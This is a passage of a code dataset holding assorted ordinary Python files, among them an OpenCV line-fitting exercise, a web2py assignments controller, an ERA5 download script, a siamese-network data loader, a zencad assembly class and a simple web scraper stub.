1000 + b[0]]\n a= a[0]\n b=b[0]\n cv2.line(img, (int(Start[0]), int(Start[1])), (int(End[0]), int(End[1])), (0, 255, 0))\n for i in range(n):\n cv2.line(img, (int(pts[ i, 0 ]), int(pts[i, 1 ])),(int(pts[ i, 0 ]), int(pts[i , 1])), (255, 255, 255), 5)\n for iter in range(15):\n print(iter)\n W = residual(pts[:, 0], pts[:, 1], a, b, n)\n X1 = np.linalg.pinv((A.T @ W @ A)) @ (A.T @ W @ Y)\n a = X1[0, 0]\n b = X1[1, 0]\n Start = [0, a * 0 + b]\n End = [1000, a * 1000 + b]\n if iter%3 == 0:\n cv2.line(img, (int(Start[0]), int(Start[1])), (int(End[0]), int(End[1])), (255, 0, 0))\n ptlst=[]\n end = True\n #cv2.putText(img, str(abs(volume)), (100,100),cv2.FONT_HERSHEY_SCRIPT_SIMPLEX, 1,(0,255,0), 2 )\n\ndef residual(X, Y, a, b, n):\n res =[]\n for i in range(n):\n res.append(Y[i] - (a*X[i]+b))\n R = np.stack(res)\n w=[]\n for i in range(n):\n w.append(1/ ((abs(R[i])/1.3998) +1))\n W = np.stack(w)\n return np.diag(W)\n\n\n\nimg = np.zeros((1000, 1000, 3), np.uint8)\nptlst =[]\ncv2.namedWindow('image')\ncv2.setMouseCallback('image', draw_rectangle)\n\nend =False\n\nwhile True:\n cv2.imshow('image', img) # 화면을 보여준다.\n k = cv2.waitKey(1) & 0xFF\n if k == 27:\n break\ncv2.destroyAllWindows()\n","sub_path":"HW11/hw_2.py","file_name":"hw_2.py","file_ext":"py","file_size_in_byte":2429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"526933491","text":"@auth.requires(auth.has_membership('Examiner') or auth.has_membership('Admin') or auth.has_membership('Student'))\ndef index():\n locations = db(db.C_Location).select()\n courses = db(db.Course).select()\n specializations = db(db.Specialization).select()\n batches = db(db.Batch).select()\n if auth.has_membership(3):\n student = db(db.Student.Student_appID == auth.user.id).select()\n batch_id = student[0].Batch\n student_query =db.Assignments.student_id == student[0].id\n batch_query 
= db.Assignments.Batch_id == batch_id\n assignments = db(student_query | batch_query ).select()\n submitals = db(db.Assignment_content.Student_ID == student[0].id).select()\n return locals()\n\n@auth.requires(auth.has_membership('Examiner') or auth.has_membership('Admin'))\ndef batch_assignments():\n batch_name = request.vars.batch_name\n batch_id = request.vars.batch_id\n submitals = db(db.Assignment_content).select()\n Assignments = db(db.Assignments.Batch_id == request.vars.batch_id).select()\n students = db(db.Student.Batch == request.vars.batch_id).select()\n course = db(db.Batch.id == request.vars.batch_id).select(db.Batch.Batch_Course)[0].Batch_Course\n subjects = db(db.Subjects.Subject_Course == course).select()\n return locals()\n\n@auth.requires(auth.has_membership('Examiner') or auth.has_membership('Admin'))\ndef add_BAassignments():\n batch_name = request.vars.batch_name\n batch_id = request.vars.batch_id\n course = db(db.Batch.id == batch_id).select(db.Batch.Batch_Course)[0].Batch_Course\n db.Assignments.insert( Assignemnt_title=request.vars.assign_title,\n Batch_id=batch_id,\n course=course,\n subject_assign=request.vars.assign_sub,\n FinalSubmission_date=request.vars.assign_date,\n Origianl_content=request.vars.assign_content)\n db.commit()\n db.activity_log.insert( Title_entry=\"Added Batch Assignment\", \n referance_id=auth.user.id,\n remarks=\"Batch Assignemnt added {}\".format(request.vars.assign_title))\n db.commit()\n redirect(URL('assignments','batch_assignments',vars=dict(batch_name=batch_name,batch_id=batch_id)))\n return locals()\n\n@auth.requires(auth.has_membership('Examiner') or auth.has_membership('Admin')) \ndef add_STassignments():\n batch_name = request.vars.batch_name\n batch_id = request.vars.batch_id\n course = db(db.Batch.id == batch_id).select(db.Batch.Batch_Course)[0].Batch_Course\n db.Assignments.insert( Assignemnt_title=request.vars.assign_title,\n student_id=request.vars.student_id,\n course=course,\n subject_assign=request.vars.assign_sub,\n FinalSubmission_date=request.vars.assign_date,\n Origianl_content=request.vars.assign_content)\n db.commit()\n db.activity_log.insert( Title_entry=\"Added Student Assignment\", \n referance_id=auth.user.id,\n remarks=\"Student Assignemnt added {}\".format(request.vars.assign_title))\n db.commit()\n redirect(URL('assignments','batch_assignments',vars=dict(batch_name=batch_name,batch_id=batch_id)))\n return locals()\n\n\n@auth.requires(auth.has_membership('Examiner') or auth.has_membership('Admin'))\ndef delete_assignments():\n batch_name = request.vars.batch_name\n batch_id = request.vars.batch_id\n db(db.Assignments.id == request.vars.assing_id).delete()\n db.commit()\n db.activity_log.insert( Title_entry=\"Deleted Batch Assignment\", \n referance_id=auth.user.id,\n remarks=\"Batch Assignemnt deleted {}, {}\".format(request.vars.assing_id,batch_id))\n db.commit()\n redirect(URL('assignments','batch_assignments',vars=dict(batch_name=batch_name,batch_id=batch_id)))\n return locals()\n\n\n@auth.requires(auth.has_membership('Examiner') or auth.has_membership('Admin') or auth.has_membership('Student')) \ndef submit_assignments():\n student_id = db(db.Student.Student_appID == auth.user.id).select(db.Student.id)[0].id\n db.Assignment_content.insert(Assignemnt_title=request.vars.asignID,\n Student_ID=student_id,\n Assignment_file=request.vars.assign_content)\n db.commit()\n db.activity_log.insert( Title_entry=\"Submit Assignment\", \n referance_id=auth.user.id,\n remarks=\"Assignemnt Submitted 
{}\".format(request.vars.asignID))\n db.commit()\n redirect(URL('assignments','index'))\n return locals()\n\n\n@auth.requires(auth.has_membership('Examiner') or auth.has_membership('Admin') or auth.has_membership('Student')) \ndef download():\n \"\"\"\n allows downloading of uploaded files\n http://..../[app]/default/download/[filename]\n \"\"\"\n if auth.has_membership(1):\n user = \"Admin\"\n elif auth.has_membership(2):\n user = \"Examiner\"\n elif auth.has_membership(3):\n user = \"student\"\n elif auth.has_membership(5):\n user = \"Managment\"\n\n db.activity_log.insert( Title_entry=\"Download assignment\", \n referance_id=auth.user.id,\n remarks=\"content downloaded by {}\".format(user))\n db.commit()\n return response.download(request, db)\n","sub_path":"controllers/assignments.py","file_name":"assignments.py","file_ext":"py","file_size_in_byte":5496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"174122385","text":"import sys\nimport glob\nimport random\n\nimport pygame.mixer\nimport serial\n\n#from sushi_parameter import SushiParameter\n\nBLUETOOTH = '/dev/ttyAMA0'\n#BLUETOOTH = '/dev/ttyS0'\nRATE = 9600\n\n\nif __name__ == '__main__':\n \n ser = serial.Serial(BLUETOOTH, RATE, timeout=2)\n drumroll_list = glob.glob(\"soundfile/roll/*.mp3\")\n complete_sound_list = glob.glob('soundfile/comp/*.mp3')\n\n while True:\n try:\n# ser.write(b'sent message\\n')\n\n# is_finished = False\n strmsg=\"\"\n strmsg=ser.readline().decode() #受け取ったメッセージをbyte->stringに直してstrmsgに代入してます\n if strmsg is \"\":\n print('get nothing')\n continue\n print('get',strmsg) #Oya機から受け取った値を出力します\n# received_values = list(strmsg.split(','))\n# sushi_parameter = SushiParameter(received_values[0],received_values[1],received_values[2],received_values[3])\n# \n# #くっついて縦振りしてると音楽を流す\n# if sushi_parameter.is_shake and sushi_parameter.is_stick:\n# drumroll_file = random.choice(drumroll_list)\n# play_music(drumroll_file)\n# is_finished = True\n# \n# #握っていて、距離が違いと鳴らす\n# if is_finished and sushi_parameter.dist > -43.0:\n# complete_file = random.choice(complete_sound_list)\n# if not pygame.mixer.music.get_busy():\n# play_music(complete_file)\n\n\n\n except KeyboardInterrupt:\n ser.close()\n sys.exit(0)\n\n\n\ndef play_music(self, filepath):\n if pygame.mixer.get_init() is None:\n pygame.mixer.init()\n \n pygame.mixer.music.load(filepath)\n pygame.mixer.music.play(1)\n\n","sub_path":"RaspberryPi/testPlay/test_serial.py","file_name":"test_serial.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"545156105","text":"#!/usr/bin/env python\nimport cdsapi\nimport datetime\nimport numpy as np\nimport sys\nexecfile(\"date_str.py\")\nc = cdsapi.Client()\n\noutputdir = \"/gws/nopw/j04/ncas_climate_vol1/users/myoung02/datasets/era5/hourly/\"\n\ntime_ls = [\"00:00\",\"01:00\",\"02:00\",\"03:00\", \"04:00\", \"05:00\",\"06:00\", \"07:00\", \"08:00\",\"09:00\", \"10:00\", \"11:00\",\"12:00\", \"13:00\", \"14:00\",\"15:00\", \"16:00\", \"17:00\",\"18:00\", \"19:00\", \"20:00\",\"21:00\", \"22:00\", \"23:00\"]\n\ndef do_stuff(year,month,var_name):\n month_str = mon_string(month)\n nday = dayinmo(year,month)\n day_ls = []\n for d in np.arange(1,nday+1,1):\n day_ls.append(day_string(d))\n\n output_fname = outputdir+\"era5_hrly_\"+var_name+\"_\"+month_str+\"_\"+str(year)+\".nc\"\n c.retrieve(\"reanalysis-era5-single-levels\",\n {\"product_type\": \"reanalysis\",\n \"format\":\"netcdf\",\n 
\"variable\":var_name,\n \"area\":\"40/-30/-40/70\", # North, West, South, East. Default: global\n \"year\":year,\n \"month\":month_str,\n \"day\":day_ls,\n \"time\":time_ls},\n output_fname)\n\n return []\nif __name__ == \"__main__\":\n output = do_stuff(int(sys.argv[1]),int(sys.argv[2]),sys.argv[3])\n","sub_path":"get_era5_hourly.py","file_name":"get_era5_hourly.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"499680414","text":"def solve(cad):\n sz = len(cad)\n ret = sz\n for i in range(1, sz):\n for j in range(i, sz):\n if cad[j] == cad[j-i]:\n ret += 1\n else:\n break\n return ret\n\nassert 11 == solve('ababaa'), ' oops '\nassert 3 == solve('aa'), 'oops'\n#for _ in range(int(input())):\n# print(solve(input()))\n","sub_path":"HackerRank/Algorithms/Strings/stringSimilarity/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"353114421","text":"\"\"\"\n练习2 : 拷贝一个目录\n编写程序完成,将一个文件夹拷贝一份\n* 假设文件夹中只有普通文件\n* 将每个文件的拷贝作为一个拷贝事件\n* 使用进程池完成事件\n\n提示 : os.mkdir('name')\n\"\"\"\nfrom multiprocessing import Pool,Queue\nimport os,sys\n\nq = Queue() # 创建消息队列\n\n# 拷贝一个文件\ndef copy(file,old_folder,new_folder):\n fr = open(old_folder+'/'+file,'rb')\n fw = open(new_folder+'/'+file,'wb')\n while True:\n data = fr.read(1024)\n if not data:\n break\n n = fw.write(data) # 写入多少就是拷贝多少\n q.put(n) # 放入消息队列\n fr.close()\n fw.close()\n\n# 获取文件夹大小\ndef get_size(dir):\n total_size = 0\n for file in os.listdir(dir):\n total_size += os.path.getsize(dir+'/'+file)\n return total_size\n\n# 使用进程池\ndef main():\n old_folder = input(\"你要拷贝的目录:\")\n # 文件夹大小\n total_size = get_size(old_folder)\n new_folder = old_folder + \"-备份\"\n try:\n os.mkdir(new_folder)\n except:\n sys.exit(\"该目录已存在\")\n\n # 创建进程池\n pool = Pool()\n # 遍历目录,确定要拷贝的文件\n for file in os.listdir(old_folder):\n pool.apply_async(func=copy,args=(file,old_folder,new_folder))\n\n copy_size = 0\n while copy_size < total_size:\n copy_size += q.get() # 从消息队列获取数值累加\n print(\"拷贝了 %.2f%%\"%(copy_size/total_size*100))\n\n\n pool.close()\n pool.join()\n\nif __name__ == '__main__':\n main()","sub_path":"month_02/teacher/day13/exercise_2.py","file_name":"exercise_2.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"556390616","text":"def swap(s, p, q):\n l = list(s)\n l[q], l[p] = l[p], l[q]\n return \"\".join(l)\n\n\ndef permute(s, l, r):\n if l == r:\n print([s])\n return\n\n i = l\n while i <= r:\n s = swap(s, l, i)\n permute(s, l + 1, r)\n s = swap(s, l, i)\n i += 1\n\n\ns = \"abc\"\npermute(s, 0, len(s) - 1)\n","sub_path":"cracking-the-code-interview/VII_technical-questions/technique2/permutations.py","file_name":"permutations.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"395250271","text":"# -*- encoding: utf-8 -*-\nimport random\nimport numpy as np\nimport os\n\nfrom torch.utils.data import Dataset\nfrom PIL import Image\nimport torchvision.transforms as transforms\n\nclass ImageDataset(Dataset):\n\tdef __init__(self, N_datasets, D_datasets, class_num, transforms_= None):\n\t\tself.N_datasets = N_datasets\n\t\tself.D_datasets = D_datasets\n\t\tself.class_num = class_num\n\t\tself.transform = transforms.Compose(transforms_)\n\t\tself.N_each_item_idx 
= [np.where(np.array(N_datasets.targets) == i)[0] for i in range(self.class_num)]\n\t\tself.len = 577\n\n\tdef __getitem__(self, index):\n\t\ttemp = index // self.len + 1\n\t\t##### 第一次遍历作为正样本既A的黑配A的白 #####\n\t\tif temp == 1:\n\t\t\tindex = index % self.len\n\t\t\titem_A = self.transform(Image.open(self.N_datasets.samples[index][0]))\n\t\t\titem_B = self.transform(Image.open(self.D_datasets.samples[index][0]))\n\t\t\tlabel = 1\n\t\t##### 第二次遍历作为负样本既A的黑配B的黑 #####\n\t\tif temp == 2:\n\t\t\tindex = index % self.len\n\t\t\trandom_num = random.randrange(1, self.class_num)\n\t\t\trandom_index = (self.N_datasets.targets[index] + random_num) % self.class_num\n\t\t\titemA_idx, itemB_idx = index, self.N_each_item_idx[random_index][index % len(self.N_each_item_idx[random_index])]\n\t\t\titem_A = self.transform(Image.open(self.N_datasets.samples[itemA_idx][0]))\n\t\t\titem_B = self.transform(Image.open(self.N_datasets.samples[itemB_idx][0]))\n\t\t\tlabel = 0\n\t\treturn item_A, item_B, label\n\n\tdef __len__(self):\n\t\treturn self.len*2","sub_path":"pytorch-siamese&GAN_day_night_resnet50_test/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"493575916","text":"from __future__ import print_function, division\nimport os, sys\nimport numpy as np\nfrom os.path import join\nfrom dataset import Config as DatasetConfig\nfrom dataset import Dataset\nimport pdb\nfrom scipy.spatial.distance import cdist\nimport matplotlib.pyplot as plt\nplt.switch_backend('agg')\n\n\nclass Config(DatasetConfig):\n def __init__(self):\n super(Config, self).__init__()\n self.est_config = \"====== Intrinsic Dimension Estimation ======\"\n self.log_dir = \"exp/vanilla/log\"\n # self.num_threads = 10\n self.log_filename = \"est.log\"\n # self.logrs = \"-4:0:20\" # from -4 to 0 with 20 steps\n self.logrs = \"-10:10:100\" # from -10 to 10 with 100 steps\n\n\nclass Solver(object):\n def __init__(self, dataset, config):\n self.dataset = dataset\n self.log_dir = config.log_dir\n # self.logrs = config.logrs\n \n def compute_pairwise_l2distance(self):\n print('ues L2 norm to compute the distance')\n num_samples = len(self.dataset)\n samples = self.dataset.samples\n # pdb.set_trace()\n R,C = np.triu_indices(num_samples,1) # Denote N = num_samples\n pair_innerdot = np.einsum('ij,ij->i', samples[R,:], samples[C,:]) \n # shape: (Nx(N-1)/2,) items are uptriangular part of mat [(Xi, Xj)], () denotes inner product\n norm = np.einsum('ij,ij->i', samples, samples) # shape: (N,)\n return norm[R] + norm[C] - 2*pair_innerdot \n \n def compute_pairwise_l1distance(self):\n print('ues L1 norm to compute the distance')\n num_samples = len(self.dataset)\n samples = self.dataset.samples\n R, C = np.triu_indices(num_samples, 1) # Denote N = num_samples\n # R, C contain the row indexs and column indexs of upper-triangular part\n # shape: (Nx(N-1)/2,)\n l1norm = np.abs(samples[R, :] - samples[C, :]).sum(-1)\n\n return l1norm\n \n def optimized_pairwise_l1distance(self):\n print('ues L1 norm to compute the distance')\n num_samples = len(self.dataset)\n samples = self.dataset.samples\n \"\"\"\n samples: matrix of size NxD\n Returns: NxN matrix D, with entry D_ij = manhattan or L1 distance between rows X_i and X_j\n \"\"\"\n D = cdist(samples, samples, metric='cityblock')\n iu1 = np.triu_indices(num_samples)\n D[iu1] = float('inf')\n # set the upper-triangular as Positive infinity\n return D\n \n def 
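# --- Aside: a toy illustration of the index bookkeeping in dataloader.py
# --- above: group sample indices by class, then pick a *different* class for a
# --- negative pair via a modular offset. Labels here are made up.
import random
import numpy as np

targets = [0, 1, 2, 0, 1, 2, 0]
class_num = 3
each_class_idx = [np.where(np.array(targets) == c)[0] for c in range(class_num)]
print(each_class_idx)       # [array([0, 3, 6]), array([1, 4]), array([2, 5])]

anchor = 4                  # pick some anchor sample
neg_class = (targets[anchor] + random.randrange(1, class_num)) % class_num
assert neg_class != targets[anchor]   # offset in [1, class_num) guarantees this
neg_idx = each_class_idx[neg_class][anchor % len(each_class_idx[neg_class])]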
optimized_pairwise_l2distance(self):\n print('ues L2 norm to compute the distance')\n num_samples = len(self.dataset)\n samples = self.dataset.samples\n \"\"\"\n samples: matrix of size NxD\n Returns: NxN matrix D, with entry D_ij = squared euclidean distance between rows X_i and X_j\n \"\"\"\n # Math? See https://stackoverflow.com/questions/37009647\n sum_X = np.sum(np.square(samples), 1)\n D = np.add(np.add(-2 * np.dot(samples, samples.T), sum_X).T, sum_X)\n # **0.5 ?\n iu1 = np.triu_indices(num_samples)\n D[iu1] = float('inf')\n # set the upper-triangular as Positive infinity\n return D\n\n def optimized_compute_Cr(self, distances, r):\n num_samples = len(distances)\n print(np.sum(distances < r), num_samples)\n return np.sum(distances < r) / (0.5*num_samples*(num_samples-1))\n\n \n def compute_Cr(self, distances, r):\n return np.sum(distances < r) / len(distances)\n \n def show_curve(self, logrs, version=1):\n start, end, step = logrs.split(\":\")\n assert int(step) > 0\n logrs = np.linspace(float(start), float(end), num=int(step))\n rs = np.exp(logrs)\n print(rs)\n # distances = self.compute_pairwise_l1distance()\n \n # if version == 1:\n # distances = self.compute_pairwise_l1distance()\n # else:\n # distances = self.compute_pairwise_l2distance()\n \n if version == 1:\n distances = self.optimized_pairwise_l1distance()\n else:\n distances = self.optimized_pairwise_l2distance()\n print(distances)\n logCrs = []\n for r in rs:\n logCrs.append(self.optimized_compute_Cr(distances, r))\n # pdb.set_trace()\n # logCrs.append(self.compute_Cr(distances, r))\n logCrs = np.log(np.array(logCrs))\n logCrs_d = (logCrs - logCrs[[*range(1,len(logCrs)), -1]]) / (logrs[0] - logrs[1])\n logCrs_d = logCrs_d[~np.isnan(logCrs_d)]\n logCrs_d = logCrs_d[np.isfinite(logCrs_d)]\n # remove the nan and inf from logCrs_d\n print(\"candidate estiamted instrinsic dim: {}\".format(logCrs_d))\n\n\ndef main(config):\n dataset = Dataset(config)\n print(\">> creating solver\")\n solver = Solver(dataset, config)\n print(\">> solving\")\n solver.show_curve(config.logrs)\n print(\">> task finished\")\n\n\nif __name__ == '__main__':\n from utils import Logger\n config = Config()\n config.parse_args()\n if not os.path.exists(config.log_dir):\n os.makedirs(config.log_dir)\n sys.stdout = Logger('{0}/{1}'.format(config.log_dir, config.log_filename))\n config.print_args()\n main(config)\n\n","sub_path":"intrinsic_dimension/estimate_intrinsic_dim.py","file_name":"estimate_intrinsic_dim.py","file_ext":"py","file_size_in_byte":5192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"114689920","text":"# Pretty print the database \n# currently unable to populate the db but this is how I think I would pprint\n\nfrom peewee import *\nfrom act7_personjob_model import Person, Job, Department\nfrom pprint import pprint\n\n\ndef pretty_print():\n # acccess the data base\n\n database = SqliteDatabase('act7_personjob.db')\n database.connect()\n database.execute_sql('PRAGMA foreign_keys = ON;')\n\n # create query \n query = (Person.select(Person, Job, Department).join(Job, JOIN.INNER).join(Department, JOIN.INNER))\n\n # loop through the query and pprint \n for line in query:\n pprint(f'{item.person} had this job {line.job.job_name} in {line.job.department.department_name} department.')\n\n # close the database\n 
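# --- Aside: a compact, end-to-end version of the correlation-dimension
# --- estimate performed by estimate_intrinsic_dim.py above. For points drawn
# --- uniformly in the unit square, the slope of log C(r) against log r should
# --- come out near 2. The sample size and r-range are illustrative choices.
import numpy as np

rng = np.random.default_rng(0)
X = rng.random((500, 2))                        # a 2-D uniform cloud
D = np.sqrt(((X[:, None, :] - X[None, :, :]) ** 2).sum(-1))
dists = D[np.triu_indices(len(X), 1)]           # unique pairwise distances
rs = np.logspace(-1.5, -0.5, 10)
Cr = np.array([(dists < r).mean() for r in rs]) # correlation integral C(r)
slope = np.polyfit(np.log(rs), np.log(Cr), 1)[0]
print(round(slope, 2))                          # ~2, the intrinsic dimension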
database.close()\n\npretty_print()","sub_path":"Student/AndyKwon/Lesson07/Activity07/act7_pretty_print.py","file_name":"act7_pretty_print.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"11233677","text":"\"\"\"Sense the temperature.\"\"\"\n\nimport dht\nimport machine\n\n\ndef temperatureAndHumidity():\n \"\"\"Main program starts here.\"\"\"\n d = dht.DHT11(machine.Pin(16))\n d.measure()\n temp = d.temperature()\n humidity = d.humidity()\n return temp, humidity\n","sub_path":"MQTT/temperatureSensor.py","file_name":"temperatureSensor.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"379689088","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Time : 2020/10/21 20:40\n@Auth : Mr. William 1052949192\n@Company :特斯汀学院 @testingedu.com.cn\n@Function :选择排序\n\"\"\"\n\"\"\"\n全班学生身高\nheight = [166, 187, 156, 144, 155, 177, 167, 153, 188, 169]\n1.找出最高的学生身高\n2.从低到高排序\n\"\"\"\nheight = [166, 187, 156, 144, 155, 177, 167, 153, 188, 169]\n\nmaxh = height[0]\nfor i in range(1, len(height)):\n if height[i] > maxh:\n maxh = height[i]\n\nprint(maxh)\n\n\"\"\"\n每一次从待排序的数据元素中选出最小(或最大)的一个元素,\n存放在序列的起始位置或者结束为止,直到全部待排序的数据元素排完。\n\"\"\"\nheight = [166, 187, 156, 144, 155, 177, 167, 153, 188, 169]\n\n# 控制比较和交换的轮次\nfor j in range(0, len(height) - 1):\n # 记录最大的下标\n maxh = 0\n for i in range(1, len(height) - j):\n if height[i] > height[maxh]:\n # 记录大的下标\n maxh = i\n\n # 把最大的和最后一做对调\n height[maxh], height[len(height) - 1 - j] = \\\n height[len(height) - 1 - j], height[maxh]\n\nprint(height)\n\na = 1\nb = 2\na, b = b, a\nprint(a, b)\n","sub_path":"class04/example02.py","file_name":"example02.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"824051","text":"import pyservoce\nimport evalcache\nimport numpy\n\nimport zencad.settings\n\nclass ShapeView:\n\tdef __init__(self, sctrl):\n\t\tself.sctrl = sctrl\n\n\tdef set_location(self, trans):\n\t\tself.sctrl.set_location(trans)\n\n\tdef hide(self, en):\n\t\tself.sctrl.hide(en)\n\nclass unit:\n\t\"\"\"Базовый класс для использования в кинематических цепях и сборках\n\n\tВычисляет свою текущую позицию исходя из дерева построения.\n\tДержит список наследников, позиция которых считается относительно него. 
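# --- Aside: act7_pretty_print.py above binds each joined row to `line` but
# --- then formats `item.person`, which would raise a NameError. A consistent
# --- loop body, assuming the row exposes the attributes the original reaches
# --- for, would be:
#
#     for line in query:
#         pprint(f'{line} had this job {line.job.job_name} in '
#                f'{line.job.department.department_name} department.')
#
# --- And a compact restatement of the selection sort in example02.py above:
# --- each pass selects the largest remaining element and swaps it to the end
# --- of the unsorted prefix. Same algorithm, trimmed to a checked function.
def selection_sort(a):
    a = list(a)
    for j in range(len(a) - 1):
        m = 0                                   # index of the largest so far
        for i in range(1, len(a) - j):
            if a[i] > a[m]:
                m = i
        a[m], a[len(a) - 1 - j] = a[len(a) - 1 - j], a[m]  # max goes to the back
    return a

assert selection_sort([166, 187, 156, 144]) == [144, 156, 166, 187]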
\n\t\"\"\"\n\n\tdef __init__(self, \n\t\t\t\tparent=None,\n\t\t\t\tshape=None,\n\t\t\t\tname=None, \n\t\t\t\tlocation=pyservoce.libservoce.nulltrans()): \n\t\tself.parent = parent\n\t\tself.shape = shape\n\t\tself.location = evalcache.unlazy_if_need(location)\n\t\tself.global_location = self.location\n\t\tself.name = name\n\t\tself.color = None\n\t\tself.dispobjects = []\n\t\tself.shapes_holder = []\n\n\t\tself.views = set()\n\t\tself.childs = set()\n\n\t\tif parent is not None:\n\t\t\tparent.add_child(self)\n\n\tdef add_child(self, child):\n\t\tchild.parent = self\n\t\tself.childs.add(child)\n\n\tdef link(self, child):\n\t\tself.add_child(child)\n\n\tdef location_update(self, deep=True, view=True):\n\t\tif self.parent is None:\n\t\t\tself.global_location = self.location\n\n\t\telse:\n\t\t\tself.global_location = self.parent.global_location * self.location\n\n\t\tif deep:\n\t\t\tfor c in self.childs:\n\t\t\t\tc.location_update(deep=True, view=view)\n\n\t\tif view:\n\t\t\tself._apply_view_location(False)\n\n\tdef relocate(self, location, deep=False, view=True):\n\t\tself.location = evalcache.unlazy_if_need(location)\n\t\tself.location_update(deep=deep, view=False)\n\n\t\tif view:\n\t\t\tself._apply_view_location(deep=deep)\n\n\tdef set_objects(self, objects):\n\t\tself.dispobjects = objects\n\n\tdef add_object(self, d):\n\t\tself.dispobjects.append(d)\n\n\tdef add_shape(self, shp, color=zencad.settings.Settings.get_default_color()):\n\t\tshp = evalcache.unlazy_if_need(shp)\n\t\tcontroller = pyservoce.interactive_object(shp)\n\t\tcontroller.set_color(pyservoce.color(color))\n\t\tself.dispobjects.append(controller)\n\t\tself.shapes_holder.append(shp)\n\t\treturn controller\n\n\tdef add_triedron(self, length=10, width=1, arrlen=1,\n\t\t\txcolor=pyservoce.red, ycolor=pyservoce.green, zcolor=pyservoce.blue):\n\t\tself.xaxis = pyservoce.draw_arrow(pyservoce.point3(0,0,0), pyservoce.vector3(length,0,0), clr=xcolor, arrlen=arrlen, width=width)\n\t\tself.yaxis = pyservoce.draw_arrow(pyservoce.point3(0,0,0), pyservoce.vector3(0,length,0), clr=ycolor, arrlen=arrlen, width=width)\n\t\tself.zaxis = pyservoce.draw_arrow(pyservoce.point3(0,0,0), pyservoce.vector3(0,0,length), clr=zcolor, arrlen=arrlen, width=width)\n\n\t\tself.dispobjects.append(self.xaxis)\n\t\tself.dispobjects.append(self.yaxis)\n\t\tself.dispobjects.append(self.zaxis)\n\n\tdef set_shape(self, shape):\n\t\tself.shape = shape\n\n\tdef set_color(self, *args, **kwargs):\n\t\tself.color = pyservoce.color(*args, **kwargs)\n\n\tdef print_tree(self, tr=0):\n\t\ts = \"\\t\" * tr + str(self) \n\t\tprint(s)\n\t\t\n\t\tfor c in self.childs:\n\t\t\tc.print_tree(tr+1)\n\n\tdef __str__(self):\n\t\tif self.name:\n\t\t\tn = self.name\n\t\telse:\n\t\t\tn = repr(self)\n\n\t\tif self.shape is None:\n\t\t\th = \"NullShape\"\n\t\telse:\n\t\t\th = self.shape.__lazyhexhash__[0:10]\n\n\t\treturn str((n,h))\n\n\tdef _apply_view_location(self, deep):\n\t\t\"\"\"Перерисовать положения объектов юнита во всех зарегестрированных \n\t\tview. 
Если deep, применить рекурсивно.\"\"\"\n\n\t\tfor v in self.views:\n\t\t\tv.set_location(self.global_location)\n\n\t\tif deep:\n\t\t\tfor c in self.childs:\n\t\t\t\tc._apply_view_location(deep)\n\t\t\n\tdef bind_scene(self, \n\t\t\t\tscene, \n\t\t\t\tcolor=zencad.settings.Settings.get_default_color(), \n\t\t\t\tdeep=True):\n\t\tself.location_update(deep)\n\n\t\tfor d in self.dispobjects:\n\t\t\tscene.viewer.display(d)\n\t\t\tself.views.add(ShapeView(d))\n\n\t\tif self.shape is not None:\n\t\t\tif self.color is not None:\n\t\t\t\tcolor = self.color\n\t\n\t\t\tshape_view = ShapeView(scene.add(\n\t\t\t\tevalcache.unlazy_if_need(self.shape), \n\t\t\t\tcolor))\n\t\t\tscene.viewer.display(shape_view.sctrl)\n\t\t\tself.views.add(shape_view)\n\n\t\tself._apply_view_location(deep=False)\n\n\t\tif deep:\n\t\t\tfor c in self.childs:\n\t\t\t\tc.bind_scene(scene, color=color, deep=True)\n\n","sub_path":"zencad/assemble.py","file_name":"assemble.py","file_ext":"py","file_size_in_byte":4234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"585333210","text":"__author__ = 'mikhail91'\n\nfrom setuptools import setup, find_packages\n\nsetup(\n name='datapopclient',\n version='0.1.0',\n url='https://github.com/hushchyn-mikhail/DataPopularity',\n author='Mikhail Hushchyn',\n author_email='mikhail91@yandex-team.ru',\n packages=find_packages(),\n description='',\n include_package_data=True,\n py_modules = ['datapopclient'],\n install_requires=[\n 'numpy >= 1.9.2',\n 'pandas >= 0.14.0',\n 'requests >= 2.5.3',\n ],\n)\n","sub_path":"datapopclient/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"260090519","text":"import re\nimport gzip\nimport sys\nimport urllib.error\nimport urllib.request\nimport header\n\n\n#url=${url}\nreq=urllib.request.Request(url, headers=header.header())\nhander_cookie=urllib.request.HTTPCookieProcessor()\nbuild_cookie=urllib.request.build_opener(hander_cookie)\nurllib.request.install_opener(build_cookie)\n\ntry:\n\tresp=urllib.request.urlopen(req)\nexcept urllib.error.HTTPError as e:\n\tprint('urllib.error.HTTPError:',e)\n\tsys.exit()\n\ngzip_rbuf = gzip.decompress(resp.read())\nhtml = gzip_rbuf.decode()\nif not html:\n\tsys.exit()\n\n#proxys = re.findall(${pattern}, html, 